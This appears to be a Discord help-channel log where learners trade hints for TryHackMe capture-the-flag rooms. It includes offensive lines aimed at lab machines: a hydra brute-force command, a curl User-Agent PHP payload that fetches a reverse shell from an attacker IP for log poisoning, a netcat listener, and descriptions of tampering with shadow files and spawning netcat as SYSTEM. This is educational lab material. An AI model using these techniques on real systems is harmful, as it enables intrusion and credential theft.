#room-hints

Ok, ignore the js just now.

Have a look elsewhere

ok understood.
i will give it a try. Thank you ❤️

Gave +1 Rep to @lucid junco (current: #2 - 2044)

Hey0 good morning - working on this room https://tryhackme.com/room/ultratech1 - anyone have a hint on task 3? I think we gotta use /ping portion of the API to discover something? Idk....the question in task 3 makes it sound like discovring the DB isn't too difficult, ran basic sqlmap and nothing, enumerated what I could and i'm super stuck. I dont know very much about API's D:

Have you tried inserting commands in the IP address field ?

I need a hint for Pickle Rick room, I'm in despair

I've found ||username: R1ckRul3s|| and ||/login.php||

I've tried ||bruteforcing with the username and 10k passwords/digit combinations, fuzzed for SQLi, tried playing around with form values and headers|| but got nothing

Maybe doing dir enum might help you

I've found ||clue.txt|| but I guess it should be found after getting shell as www-data lol

I think I've ran out of dictionaries for dir enum

several directory dictionaries, all 1-4 letter combinations, all 3-5 digit combinations, even names dictionary

Hello, who can help me with this problem?

looks like a technical problem, better ask on #site-support

oh wait, it's just incorrect answer, I thought it's some bad request popup lol

The password can be found.

Enumeration is key

oh lord, I've found ||robots.txt|| looong time ago, but never thought about ||using it as a password||, had to get a hint from a writeup, lol

halp halp halp, I'm doing https://tryhackme.com/room/stuxctf - the only hint is diffie hellman and a page inspection that gives me digits. I'm no mathamatician - I've tried looking up diffie hellman calculators and I'm just not sure what i'm doing. Anyone care to point to me to a good resource or explain how to do this math problem?

oh man, I got my colleague who's a physics major in on this and he cant figure it out either >.<

i wonder what c is

need a hint for root flag in https://tryhackme.com/room/yearoftherabbit - do I need to analyze the core dump to find out something?

i guess not. I've found that ||user gwendoline can sudo (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt|| but im not sure what to do with it

There's a site that can help

Especially with bins

so, i'm doing mrrobot right now executing || hydra -l Elliot -P fsocity.dic 10.10.17.3 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^:The password you entered for the" -t 30 || been waiting for 30 minutes now. anything i can do to speed up the ||bruteforce||?

do you know what is vi?

sure

i know it can be exploited if ran with root privileges, but seems like I can't do it there

what did you tried to do?

since I cannot run vi as root, I don't really know what to try

i can start shell as another user, but not root

as written when you do "sudo -l" you must not only run vi as root but read the file with it too, so do "/usr/bin/vi /home/gwendoline/user.txt"

I know, but what does it change?

you can then open it and increase your privileges, because you do not have the right to use vi basically you just have the right to use vi to open user.txt

but how can I increase my privileges if I still cannot open it as root?

I can open it as anyone but root

you can open it as root

you have to find a way to do it

check the sudo version and search on google a way to do it ;)

i can't believe the exploit is so simple, lol

thanks @languid plover !

👍

Ahhhhh....i'm waiting and waiting but the mrrobot ||hydra brute force|| just won't complete

quick question to https://tryhackme.com/room/lianyu room - ||the video at /island/2100/ is no longer available - does it affect the challenge?||

because I've found ||green_arrow.ticket and the token RTy8yhBQdscX looks just like an identifier on youtube, but youtube.com/watch?v=RTy8yhBQdscX also says video no longer available)||

Maybe it is an encoded string and not an identifier

tried it, decoding it as base64 doesnt give anything readable

Hint will be, it is not base64 encoded. Try others, i usually used the tool cyberchef, served me well

thanks! got it, definitely bookmarking cyberchef

finished the room, super fun one!

What do you need heko with?

heko ❤️

Hi, I'm stuck at the Jenkins room; once i've had my rev shell, the second one is not working. The ps commands in the Jenkins application dont compile/work anymore. It only works once.

To clarify, is the room name Alfred (as there may be other rooms using Jenkins as the target application) ?

Yes roomname Alfred. https://tryhackme.com/room/alfred

By 'second one is not working', are you pertaining to the shell session not working properly?

First time i use the Jenkins application to execute a rev shell, whenver i do this again (termination of connection or because i want to upload a better shell) than the build does not complete anymore and it gives a error on the system commands that ive changed.

Aaahh... what payload are you using for the initial reverse shell?

do u need help

What wordlist are you using?

I need help with advent of cyber 2022 questions please

You can ask. Somone will answer you

Thank you

I've finished it by now. Just forgot to ||reduce the size of the wordlist you find in that room||

Hey guys, Just going over some old rooms and cant get a meterpreter shell on ToolsRus, keep getting failed aborted due to failure : unable to automatically select target.

ignore me, sorted now

Expose challenge
I started with nmap, 3 open ports. Now I'm using hydra to find the username and pass, em i at the right path ?

Try to look for an SQL injection 🙂

You made it so clear 😭😭

Whoops

Sorry.

@stuck fractal when i google it it find me your room in google

i mean the interface name is wlan0 right?

it doesnt change

i know the answer is wlan0mon i dont understand why

Did you enable monitor mode with airmon or with iw?

with airmon

sudo airmon-ng start wlan0

i dont know whats iw tbh

@stuck fractal Hi
In Room Snapped Phish-ing Line id task 7 has answer? According to question "When was the SSL certificate the phishing domain used to host the phishing kit archive first logged? (format: YYYY-MM-DD)" I check it in whois website https://www.whois.com/whois/kennaroads.buzz but still wrong

I haven't done that room, why are you pinging me for this?

Sorry my problem

Network Services 2 > Exploiting NFS > bash file

I have correctly followed all the steps, but the problem is when I execute the bash file, nothing happens. Has anyone encountered the same issue?

who owns the file?

The second step says that the copied bash file must be owned by root user, and a command is provided in which I followed.

can someone give me a hint for the ctf pickle rick

I didn't get the first ingredient

You're in a bit of a pickle I see.

kinda yeah

I found the usernam inspecting the site web

I try using hydra but ssh is not using password

then I found assets directory

The password can be enumerated.

You may actually have already found it and not even paid attention.

and I'm trying to path traversal to /home/user/.ssh/id_rsa but I can't

what do you mean enumerated

Have you found a common webpage that almost every ctf you've done.

I tried index.php but I didn't do that many ctf to know the common place to look for

I could use a hint

Beep Boop

ssh-hostkey ?

you don't need to use ssh

at all

ok ok

what''s that

A clue. 😄

really

ok ok

https://tenor.com/view/meep-morp-zeep-robot-captain-engage-jake-peralta-jake-peralta-gif-16242963

I might be too young to understand those reference sorry

B99 isn't that old 😭 @trim haven

B99 ?

it might be

Run a dirbuster on the ip.

I did

What did you get?

Gosh, how old are you!? 🤣

19

I know every single line and scene from B99 lmao

I'm 20 😭

no idea what it is

I'm from europe

maybe it's famous in usa but not europe idk

Same ^^

It's a Comedy TV Series

I'm not a comedy fan

friends and other stuff doesn't appeal me

I'm more a doctor who fan

anyway for the dirbuster should I do it again and let if finish the worlists

and can I do 2>/dev/null to get rid of the errors ?

There is a web page that is common in ctf to have some information.

ok ok

I found robots.txt

😄

That's what I was hinting on.

lol

what am I supposed to do with that

What does it look like?

no way

that's crazy

😄

but wait

no ssh

how do I use this

Have you enumerated another login web page?

it's still going

but I'll look for it

thanks

If your wordlist isn't working, try a bigger one.

alright

those

or should I look online for even bigger ones ?

I'm already using medium which is the biggest one I seem to have

Don't you have seclists?

I do yeah

let me look for a big one

thanks

there is so many but I'm trying with this one we'll see

directory-list-2.3-big.txt

Gooood idea.

I'm using the option -t250 but idk how much can I put

is it the max ?

or can I push it even more so it's faster

Don't worry about speed.

alright

I'll wait

it's long

taking his sweet time

It is 😐

can you help me

I still have nothing popping up

I tried going for /admin or /login but nothing

-x 'php'

alright

thanks

broooo

I looked for portal I swear

no way I needed .php

so when I'm doing gobuster without the option -x it won't show me directory with .* only the ones with words

with -x it will just search for the list with .php

but if I didn't use -x and keep and searching with the list for ever will it found portal.php or no

if you used -x 'php, html, txt'

It will only look for those things.

ok ok

It would have.

cause I was running it for 20 mins nothing found

and just by putting .php it took 2 sec

so I was curious

maybe by default it doesn't look for file and only plain words

@lucid junco

I might have cheat idk

I did the room privilege escalation on linux so I'm familiarize with certain stuff and the one I remembered very well is using base64 to see files

That's not cheating.

so I couldn't do cat /home/rick/'second ingredients' so I used base64 to see it

yeah but maybe that's not how I was supposed to do it yk

Yeah, but on the hand, you've taken something you've learned, and used it to gain something else.

yeah but it was luck

I didn't check if I had permission to use base64

I just tried and got lucky

Do you have a shell, or are you still using the webpage?

still on portal.php

I was thinking looking in passwd and shadow to get rick password

but yeah that's the thing I feel like I skipped steps

like I saw there is a cookie named phpsession but couldn't decode it

so I didn't look more in it

I got a shell

😄

but I'm still in the same situation lmao

do I have to look more into the phpsession cookie ?

not really.

alright

so no burp ?

Nah.

Burp isn't needed.

thanks

can I get a hint on where to look for the last one

I was thinking getting root

It's going to be in root, so I'd look for way to PrivEsc, or find out what your current shell can run.

There's a command that does that.

lmao nice

I'm not completely lost that's good

let's gooooo

why does it look like that tho ?

invisible shell

should I do import python

If you want, not essntial for this CTF though

yeah I got the 3rd

it feel so good I didn't had to look online for help

you're the best thanks a lot @lucid junco

Gave +1 Rep to @lucid junco (current: #1 - 2121)

no problem, happy hacking!

what's the difference between those two rooms :
https://tryhackme.com/r/room/linuxprivesc
https://tryhackme.com/r/room/linprivesc

by looking at the task I feel like they both are doing the same stuff

One is created by THM, one is created by a community member.

https://tryhackme.com/r/room/crackthehash
Task 1, question 4:
I can't find the $2y$ hash on hashcat's website mentioned in the hint. All I could find are 4 hashes that start with $2a$ and one hash starting with $2b$. Am I missing something?

Right now, I'm brute-forcing hash 28400 - (bcrypt(sha512($pass)) / bcryptsha512) with a lowercase four-letter mask, but it really takes a long time. 63% done, and still nothing. My guess is it's not the right hash. Should I just brute-force the hash types I mentioned as well? :/

What's your command?

hashcat -m 28400 -a 3 hash "?l?l?l?l" where hash is the file containing the hash

take a close(r) look at the hash-names in the hashcat examples

You're using the wrong number, also why not use a wordlist?

Found it with a filtered wordlist, thank you both

Gave 1 Rep to .scrubz. (current: #1 - 2123)

You're still on cooldown

You're still on cooldown

Hi, I'm currently doing Wonderland box as Alice user, and I have enumerated enough without finding proper way to make horizontal privs escalation. Actually I got 2 options, but I don"t know if it's just rabbit holes or real way of granting me another access :

• I can run a python script as another user, via sudo but I don't know how am I supposed to hijack this, I can't really tamper the script or the script path, it's hardcoded in the sudoers file
• I can exploit a capability but the gtfobins command doesn't work (permission denied) or I just get Alice shell again

Any hints ? Am I right by trying these two options ?

Did you use sudo -l ?

Yep, and I got the thing about the python script, it could be run as "rabbit" user

Have you thought about running it?

the script itself doesn't do anything crazy, just printing 10 random lines

yes

I read the code

The same 10 random lines?

not really, it changes at each new running time

Maybe now you should try and find out what the script is doing 🙂

I think I already know, it just uses the "random" function to print 10 lines thanks to a for loop but..why ? 😅

Because it's using the library random

yes, but I don't have any write permission to modify it, the variable used is set in it, I can't add a command line to be printed or interpreted by python at the same way I guess

Well, you know the script is looking for something "random"

Does the random library have a path, or is it just looking for anything that is random?

I see what you mean ! Thanks I know what I have to do 🙂

Gave +1 Rep to @lucid junco (current: #1 - 2124)

Crack the hash again, task 2:
I tried modes 150 and 160 (both HMAC-SHA1 like the hint says, but each time the key is different - password or salt) with 12-character words from rockyou.txt, and got nothing.
hashcat -m 160 -a 3 e5d8870e5bdd26602cab8dbe07a942c8669e56d6:tryhackme words.txt
What did I miss this time?..

According to a write-up, the correct hash isn't either one of the HMAC-SHA1 hash modes I tried despite the hint saying exactly that 🙃

Hello everyone, I am doing the Agentsudo ctf and I am stuck in the step where I am supposed to find the other agent's name, that starts with J, I accidentally spoiled myself and I know the name is j***s, but I have no idea how I could find it

link to the room : https://tryhackme.com/r/room/agentsudoctf

SOLVED, steghide..

can someone give me a hint at the last question on the task 6 of this room https://tryhackme.com/r/room/windowsfundamentals1xbx?

Click on properties of the user, it's an option.

should open another window right?

A pop up yeah

this?

Yeah, it's one of those 😉

i dont see anything about status

Account is ....

yep i found it now im stragaling to tipe it

thanks

oh nevermind, the hint was correct after all, but the write-up linked from the room itself says the mode is 110, but it's in fact 160 as I just finally confirmed (I used -a 3 instead of -a 0 for a dictionary attack, so that's why it was super slow...)

Hi!
vulnnetinternal
I need a little hint on how to find out the username in order to use the passwords me have already found.
I'm stuck at the stage of getting access to the machine itself:
What is the user flag? (user.txt)
||Is the username being searched in the database or is it being Brute-force?||

You will find the username upon accessing the || rsync || service.

I don't recall having any need for brute forcing.

Yeah, that's what I'm doing.
I guess I didn't get everything out of it.
I found a shared folder, but the password I found is not suitable to see what's inside.

I will look for other passwords, now I have only two of them in my hands.

If you already have the internal flag, its just a matter of further exploring the said service.

Hi, I am little stuck. In room Relevant I have acces to samba share with read/write acces. I can acces to samba share files via http. My idea is upload revers shell, but I dont know what format to use. Any idea?

web framework asp .net and google is solution 🙂

Another question, If you use brute force with rockyou.txt, how long do you keep the task running before you decide it is pointless? For CTF, not for real world pentest of course.

Depends on the ctf. The benchmark for thm is under 5 minutes

Under 5 minutes with the Attackbox*

Right that's a fair distinction

Hard for us to verify this for each users setup

Aye

Attackbox is so slow though

I've rarely had issues with it tbh

I mean for cracking hashes

Hi!
Advent of Cyber 2022
Task 23[Day 18] Sigma Lumberjack Lenny Learns New Rules
I can't figure out what kind of mistake is this?

It might be due to a missing space for the modified field

Thanks, @left thunderI rebooted the machine.
It helped.🤦‍♂️

Gave +1 Rep to @left thunder (current: #3 - 1815)

Not asking for help, but wanted to share something I encountered today. I'm going through the Linux PrivEsc room, and Task 9 involves crontabs. The challenge suggests popping a reverse shell by exploiting the way the cron job is set up. Going to spoiler this just in case: ||There's a cron job called backup.sh which is stored in karen's home directory, we have write access to it. It runs every minute. All we need to do is replace the contents of that script with the line for our reverse shell, then open up a listener on the attacking machine, and once the cron job spins up, boom, reverse shell. I did this, but nothing happened... I started looking into everything, and what I found eventually was that the shell script did not even have execute permissions. Even though there was a cron job set up, it was never running because the script can't fire anyway. I was able to chmod to add x perms, and then boom, reverse shell.||

sounds about right.

@ripe hedge thank you 🙂

Gave +1 Rep to @ripe hedge (current: #11 - 565)

Hello!
Can somebody point me to the right direction with MrRobot CTF? Please DM me if you can.
I don't want to use walkthrough.

Nvm, I found it, It was just a typo, lol

For Pickle Rick, is the apparently encrypted folders inside the var/log/journal directory used for anything?

No.

Bonus points if you get in them though

Crap, I think i broke the machine, I grep'd for ||ingredient|| over my reverse shell and now the terminal is not responding to my commands. Is there a way to cancel the grep? Or should I just wait for it to complete. I can't seem to access the login to attempt to re-establish the reverse shell

nvm

can I have a hint on privesc on pickle rick?

I know the kernal version etc. but I can't seem to find anything useful on exploitDB

Do you have a shell?

Reverse shell under www-data

I tried to steal the .ssh key but it's access denied. I checked crontabs to see if there were any scripts, apache to read the shadow file and see if there was a hash

Is there a way to see what www-data can run as sudo?

Doesn't look like much!

It does't no..

But one command in there sticks out.

although I was able to use sudo cat

Do you know why?

is it because I can run all commands?

(ALL) NOPASSWD: ALL

🤦

I tried sudo in the past, like sudo -s, it would say something like "unable to sudo"

In Picklerick?

and su root prompted me for a password I couldn't enter

Yeah

Ah, yeah, you're changing to root, so it would ask for authentication.

spoiler territory but ||sudo su root|| worked with no password

Not spoiler, that's working as intended.

Thanks to www-data ||being able to run all sudo commands without a password||

thanks for the hint!

On the subject of that|| sudo -l screen||, I thought|| "you can run all, no passwd"|| meant "you can run all commands that don't require a password" i.e. guest level access, esp since|| sudo -s ||(the classic "give me root" command) was giving me an error so I thought I wasn't in sudoers or something. (Don't tell Santa!)

am i missing something or doing something wrong? dreaming room

Look carefully at the "(death)" part

thanks, took me a bit to google the syntax and how to use it, but that did it 🙂

+rep @ivory meadow

Gave +1 Rep to @ivory meadow (current: #26 - 298)

Hi, I'm doing the TryHack3M: Bricks Heist room and believe I've found the wallet inside ||/lib/NetworkManager/inet.conf|| and after ||decoding|| it via ||hex and 2x base64|| i get an ||bc1|| wallet, but that doesn't seem to exist. Anyone who might be able to push me towards the right track?

Edit: Found a unethical solution but it did the trick: ||Abusing tryhackme's "answer format", I figured out that its length is 42 and used that - it worked! Time to get a bit more familiar with blockchain/crypto wallets I guess||

Can you give me a hint on the room

No hints on this room until Thursday 7pm UK time

Room : Bypass

Hi, I tried getting the second flag by changing|| user-agent|| but I sill get "invalid attempt" message :

||I did it with curl (-A option & -H option) = KO
I did it with Burpsuite = KO
I did it with Python = KO
I rebooted the VM = KO
I tried different version of the User-Agent (with quotes, without them) = KO||

Any hint ? ||my GET request seems ok though||

I give it a try here in addition to the dedicated channel

This has a dedicated channel, which will probably give you a better response #1225867883066691674

Oh my bad you already posted there

curl -k --user-agent "I am Steve Friend" 'http://cctv.thm/fpassword.php?id=2'

You need to make a request on port 80, specifying the user agent as "I am Steve Friend".

I will try this, but the target seems to be on port 443, according to the note

That's what I actually did throught several ways, none worked at time

It worked thank you, it doesn't make sense to me to switch from 443 to 80 between first and second task but ok 😅

Gave +1 Rep to @sullen kelp (current: #2059 - 1)

Still trying to figure out how to find the threat actor group that owns the wallet, any advice?

Feel free to send me a dm, not sure if it’s allowed yet due to Blackouts post

Please do not ask for hints in the discord server for challenge rooms that were released within the last 72 hours cc @snow zinc

My bad, didn't know about the 72hrs

It is posted in the relevant module channel #tryhack3m-special-module

Thx, missed it

Did you manage to get more info on the wallet addresses ? I’m on the last question and been exploring blockchain and the mitre attack site and a bit stuck there 😉

.

Hello Everybody , good afternoon!

I need some help with this room Network services. Enumerating Telnet . I'm stuck now for 3 days. I have try Nmap and found port 8012. I found something about skiddy but cant find it again. I tried with enum4linux and smbclient but wont work. any help 🆘 thank you !

+rep @pulsar crane

Gave +1 Rep to @pulsar crane (current: #831 - 4)

Nmap 🙂

man you just need to connect via telnet with port 8012

Thanks for the hint. let me give that a try.

that worked.

🙂 glad to help you

Gave 1 Rep to aurumdev (current: #707 - 5)

task 8 what point?

anyway if you read the task it says that the login page is :"http://MACHINE_IP/login-get/index.php"

Thanks Dansu, I totally missed that.

Gave +1 Rep to @stone orchid (current: #1367 - 2)

Greetings! I decided to start poking around some of the CTFs, and I settled on Expose as a first one. It presents a really interesting but somewhat simple challenge. From the get go, we're just given an IP address, and the name of two files to grab (a user flag and a root flag). From what I've gathered, this is a pretty usual starting point for CTFs.

I started doing some enumeration on the system, and found the following: Via an nmap -sS IP_ADDRESS scan, I was able to identify three open ports: 21 (ftp), 22 (ssh), and 53 (dns / domain). I was able to grab the versions of each of the services running on them as well. However, I hit a wall I didn't really think about. I don't even know where to start with trying to brute force a login if I have no password. I found a usernames wordlist, and am currently running a Hydra scan on the ssh to see if I can find anything, but if I were to let this scan continue to run, it would take a very long time.

So what I'm looking for is some hint as to how I can work on enumerating the users on a given host. Is there something I can flood with attempts from the wordlist that would respond with something akin to "no such user" if the username doesn't exist, and "wrong password" for a correct username? If I use hydra and just give it a single password wordlist, my understanding is that it'll just return no matches. (I tried this, and that's what happened)

Am I forgetting something really basic about how to identify users on a system without actually having access to that system?

Certainly if I had access to the system I could probably find other users, but without any access I'm feeling a bit stumped. Wanted to reach out here rather than just looking up the answer, and in the meantime I'm continuing to search / research

Do you think there is only 3 ports open on the machine, or is there more? 😉

I haven't probed deeper, but I absolutely can

I just checked -sS to start with. I suspected that might be too limited, but once those ports showed up I felt like "okay, here's something to work with", until it occurred to me that I might not have enough to work with.

You should probe deeper.

thanks @pulsar crane

Gave +1 Rep to @pulsar crane (current: #619 - 6)

will do, thank you

Gave +1 Rep to @lucid junco (current: #1 - 2173)

i was working on the Windows User Account Forensics and have gotten stumped on the following question: What is the value of the "bootKey" variable? I must be overlooking it because i got the previous and next questions correct... What does the value look like? or how is it presented in the output? or is there another command I forgot to complete?

Just an an update, because it's been sort of slow progress: ||I ran a scan on all ports, and found two additional ones! 1337 which is a web server, but seems to have basically nothing on it, and 1883 which is a mqtt mosquitto server. Been digging into the mosquitto route so far: can I find a way to subscribe to it to retrieve whatever messages are being sent from it? Yes I can! But I don't understand what good these messages could do me yet. My thought here is maybe I can find a way to publish a message to it and get it to send a message to something that will report back something useful like credentials or whatnot||

I am in the uploadvulns room, I make a revshell from revshells.com and upload it to the server while I am listening

But nothing comes back

Any ideas?

Nothing appears to be in the resources directory, where it is supposed to be

Whatever I upload, nothing goes there

In which task are you on?

5

How do I execute a .sh file through the URL once it is uploaded

?

When I navigate to it through the URL, it just downloads

How do I execute payload(1)?

In the taks for a php webshell it says just to visit it

This is a reverse shell

How do I activate it

?

Running a .sh payload will depend how the web application is processing it (e.g., if it passes it to the OS). Have you tried a php (from pentestmonkey) one?

That is the default answer

The default solution

However it is said, use either a webshell or a rev shell

I decided to use a revshell

Should I use a PHP reverse shell then?

Well, I got in

But I did not get in with a rev shell with a .sh extension

Got in with a pentestmonkey php revshell

Thank you anyways for the help!

Gave +1 Rep to @tropic garden (current: #13 - 514)

Should you choose to run a webshell, there is one somewhere in kali. Can't remember exactly if it in /usr/share/webshells but there should be one. You can then put in a reverse shell payload using that webshell, but that will take another step and it might not work in all cases depending on the web application you are dealing with.

I'll bear that in mind

Any help to get TCP flag from borderlands room?

hlo

hi

How do I stop and start a service from the meterpreter command line? (Steel mountain)

nevermind, I was able to use shell to switch to what I assume is a cmd shell

Hi.👋
I'm at the last step - room - "vulnnetinternal"
||I can't figure out how to get RCE when I've already got to the admin panel - TeamCity.||

Suggest that you do a Google search for an exploit for it.

Yes, they are, but they do what I have already received. I need to find out how to upload a shell there or get an RCE.
||exploits allow you to log in without authentication, but they don't give you a shell, and I don't understand how to upload a file for a reverse shell.||
||I even found a metasploit, but it doesn't work properly.
that's why I decided to ask how you managed to exploit the admin panel.||

||Have you loaded the payload through plugins?
Or did some script do all the work for you?||

One of the Google results when you do a search on || TeamCity exploit || will give you a vulnerability you can exploit to get RCE on the target.

Did this exploit work for you without any problems?
You didn't have any mistakes, such as:
[-] Failed to parse token XML response [-] Error in func <GetToken>, error message: syntax error: line 1, column

|| You can also try doing a search on TeamCity Pentesting ||.

Hi all. Newbie to TryHackMe. Seriously stuck on walkinganapllication Task 3 Question 3. I have no clue how to find this 'directory' in order to get this flag.txt file. I've exhausted the discord for others looking for help but I'm no further forward. Any help would be very appreciated ❤️

Do you know what forced directory browsers are?

Hi @lucid junco I do not, no.

OK, there are tools like Dirbuster and gobuster.

Research them 🙂

Thanks. I'll look into them now!

Gave +1 Rep to @lucid junco (current: #1 - 2197)

@lucid junco I'll need a bit of hand holding here. I now have a brief understanding of FDB after researching. I don't know how I apply this to this question though... I have tried altering the URL manually within my browser with no luck. My last remaining braincell is slowly burning up 😂 Wondering if I need to use another room prior to this one? I came from intro to cyber security straight to Jr pen tester.

hello everyone is the free rooms, level easy without privilage escalation?

Easy rooms may still require you to do privilege escalation, but it is something you'll need to encounter sooner or later as part of the learning process. In my case, there are a couple of rooms I'm stuck at the privesc stage. 😅

Don't forget to have fun while learning though.

Allright, I'm just not in privilage escaltion module yet

I'm doing the XSS room and at Task 7 the task is the following:
Go to the contact page and submit the following message <script>alert(document.cookie)</script>. Next, log in as the Receptionist. What is the name of the key from the displayed key-value pair?

I've logged in as the Receptionist but I don't understand what the second part is: "What is the name of the key from the displayed key-value pair?"

Have you not gotten a pop-up when logging in?

Found it, thanks @left thunder 😄

Gave +1 Rep to @left thunder (current: #3 - 1820)

I was looking in the wrong section of some tool

What this question means?

Netwrok services room

SMB enumeration task

last question

You need to enumerate the smb port and see which shares are on there that look suspicious

How to find suspicious shares?

    Sharename       Type      Comment
    ---------       ----      -------
    netlogon        Disk      Network Logon Service
    profiles        Disk      Users profiles
    print$          Disk      Printer Drivers
    IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            POLOSMB

[+] Attempting to map shares on 10.10.31.165

Out of the ones listed. What do you think good to investigate?

netlogon?

correct ans is|| profiles||

🥲

@devout moss online ???

on line

Hi!
Avengers Blog Task 6 - SQL Injection
I am confused by the question, the answer is obvious, you need to open the source code of the page and just specify the number of lines.
But it didn't fit.
I did not count the empty lines and counted only the filled ones, but also not correctly.
Probably a stupid question, but How do I count the lines correctly?)

I have a feeling that the source code is not displayed the right one after I managed to log in to "JarvisControlPanel".🤔

Can anyone else check this room?
https://tryhackme.com/r/room/avengers
I am the only one who sees such page source code in question 6.

hi, i'm looking for a hint with privilege escalation to root in cat picture 2 room (https://tryhackme.com/r/room/catpictures2)

reverse shell

can i dm ?

hey,
anyone here completed Midnight Linux. Actually i am having trouble to login from 4th user and root user i have password's of both of them but when i ssh it shows me permission denied for these users

Link the room?

https://tryhackme.com/r/room/midnightlinux9v

This room is private, we can't help, sorry

but i have a free account and i can access this room how's that possible

Are you part of a school/business?

^

Having a free account doesn't mean you can't access a private room. Private room != Premium room

hello, on the room : https://tryhackme.com/r/room/archangel

i dont really get why it doesn't work, the only intel i got is that it works for my friend but he's using VPN
so, i'm at the "Get a shell" part and there is what i'm doing for LFI to RCE via file poisoning if i'm not wrong

curl : || curl "http://10.10.184.130/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.10.154.10:8080/rev.php')) ?>" ||

i also got a python server running : python -m http.server 8080 and a netcat : nc -nvlp 9001

the problem is i dont manage to get my revshell on the target server if i'm not mistakin

Are you using the same payload as you friend? If I remember correctly, I used || /var/log/access.log to gain RCE via LFI as well ||.

yes, i tried with the one i showed AND an other method wich is exactly the one you said with burp and both doesnt work for me but work for my friends i dont get it lol it's frustrating

its ok i finnally got it with the same method as you

Intro-to-Logs: Task5 Practical Activity: Log Management with logrotate.

I've created the nano file given "/var/log/websrv-02/rsyslog_sshd.log"

and executed the given command "sudo logrotate -f /etc/logrotate.d/98-websrv-02_sshd.conf"

only to receive "error: stat of /var/log/websrv-02/rsyslog_sshd.log failed: No such file or directory"

could use some in finding out what im doing wrong.

Its really tricky to make it work especially if its your first time doing it.

https://tryhackme.com/r/room/lessonlearned

I tried every possible sql injection manually as well as using scripts, but I was not able to find any sqli, even read some writeups after getting frustrated and saw that they used the same payload which I was using and got the flag.

Is the room broken or I am missing on something ? Please guide me anyone who has solved the room .

Nobody can tell you where you went wrong without knowing exactly what you did. Exactly as in code, screenshots.

in https://tryhackme.com/r/room/profilesroom .. Will volatility 3 work for the base questions ?

This could be answered already in #1238551397784354877

Were you able to sort this out? I just completed the room and this seems to be the source code for the home before you logged in.

Just did Atlas (https://tryhackme.com/r/room/atlas) and was wondering what enumeration should I have done to discover that the target is vulnerable to || PrintNightmare ||? I know it wasn't part of the task, but I tried WinPEAS and PrivescCheck (and even did manual enumeration), but didn't get any fruitful result.

I guess the curiosity here stems on how can I further improve my Windows enumeration skills / methodology.

Hi, nah, I specifically went out and rebooted the box. That's why I asked someone else to check it out. The browser stubbornly shows me that the source code is not what I need.

The source code that showed the <Hint> is on the home page though before logging in.

I have to check the source code of this page, right?

yes

I'm just looking at the code of this very page. That's why it's weird.

Everything is fine, I used another virtual machine and the code displayed is the one I need!
What was the reason for this on the last VM, I still did not understand!

@tropic gardenThanks for checking it out. At first I thought it was a bug on the box)

I'm not certain as I only encountered the home page (before logging in) and the Jarvis page (after logging in).

Room is wgelctf. so wget has sudo withou pass. I've exfiltrated shadow file and tampered the salted pass of the user with a new one using mkpasswd -m sha-512 and then I pull back the tampered shadow. But then I can't ssh back for some reason?

nvm wget will prob append some GET headers... let me check.
Nope, not the case

Can someone please push me with the last question in the room - "TryHack3M: Bricks Heist"
Maybe I misunderstand him.
Is the answer inside the box or on external resources?

"threat group", perhaps its APTs?

external resources

Yes, I also had the idea of (APT) in the first place in my head...
I only have doubts, can these groups really be calculated by the wallet number???😅

I think you are supposed to create a new user (e.g., newroot) and assign it a user id and group id of "0".

Haven't reached that point yet, but I suppose you could tell the APT group as they usually have a wallet ID as part of the ransom note, for instance?

I think that everything is anonymous and if it were so easy to figure it out, then the black market and the "dark-web" would not exist.
You type in the wallet address and it gives you who its owner is?😅

uh?!

if said group announces themselve as creator of said ransomware, for example, then they are linked

Copy the line / record for root in /etc/shadow, replace the user name (root) with a new one (new root), replace the hashed password to one that you generated (as root user and group id is already set to 0).

how's that different from changing the password of the existing user?

It worked when I did it. 😄

At the end of the day, it's still up to you what method you use.

I would need to tamper the passwd file too with the new user, uh?

using your method

Yes. I won't get a chance to take a look at my notes until later.

I found transactions on the Internet, but there are only wallet numbers, who transferred to whom is not said, and there is also no information about the group.
Is it definitely possible to find it through external sources?

To clarify, you used this resource to search -"||blockchair.com - blockchain.com||" or some other one?

I haven't done that room yet my man

Ohhhhh, I got it, OK, I thought you passed it😄

anyone completed Osris? the issue I have is my compiled service, is not working

I'll have to debug it on Windoze

Which service?

my idea was to create a windows service to start a nc as system, as I can copy files to the box.

Where did you get the service from?

I create the windows service to impersonate one on the server

https://github.com/mattymcfatty/unquotedPoC

Try this one.

as I can start and stop services

yes, similar to that service

it's just a .NET Windows Service c#

I'll have to fully debug it locally

I'm clearly on the right track... 😂

my code and that code, works if I do something simple like create a userid, but spawning nc64.exe - not happy.

I need to debug locally it does not execute nc64.exe !

Hey, and which of you was able to answer the last question in the room - "TryHack3M: Bricks Heist"?
That the Internet research on this issue has not yielded results.

I was solving TryHack3M: Bricks Heist and noticed xmlrpc.php file, I am trying XXE attack, my payloads don't any effect, am I on right path or going for rabbit hole?

Rabbit hole.

Possibly

okayy!!

Do you have wappizer.

Probably spelt it wrong

Wappalyzer

yes.. initially my idea was to use wpscan as I saw wp-* files, but when I used it, gave error that (SSL peer certificate or SSH remote key was not OK) so thought might be doing something wrong .. then saw xml file in page source ..

now searching if there is any solution for this error..

You are in the right direction in terms of using wpscan, but you might need to plat around with the switches / flags a bit to get the info you need.

Thanks... But i solved it..
I was missing a flag while using wpscan once I used it. It was easy...

Gave +1 Rep to @tropic garden (current: #13 - 561)

Doing Gotta Catch'em All! ctf room. Im struggling to find the Water-Type Pokemon . Any hints?

You should be able to locate it.

in that ||array|| i found that pokemon. But i dont know how that flag should be defined. eg: ***{FLAG} . idk how to find what will be the starred value.

Its encrypted;)

hm..i dont see anything in the ||page-source||. Should i do anything in the ||console|| to retrieve that? or anything to do with the ||array||?

I thought you found the water type flag?

i just guessed it with googling and matching that with the ||array.|| like the previous flag. lol this is not the way it is?

locage water-type

huh. i dont understand (: You mean locate?

Yes

Let me guess..the water type must be ||squirtle|| as it was mentioned in that ||array.|| that's how i came it with it .

Yeah.

But where to look at to find that comes before it? ||console|| ?

Terminal 🙂

||web dir brute?|| i thought i did enough .

Ssh

it was in the ||page-source|| i didnt think upto that way. thanks for helping!

Gave +1 Rep to @lucid junco (current: #1 - 2304)

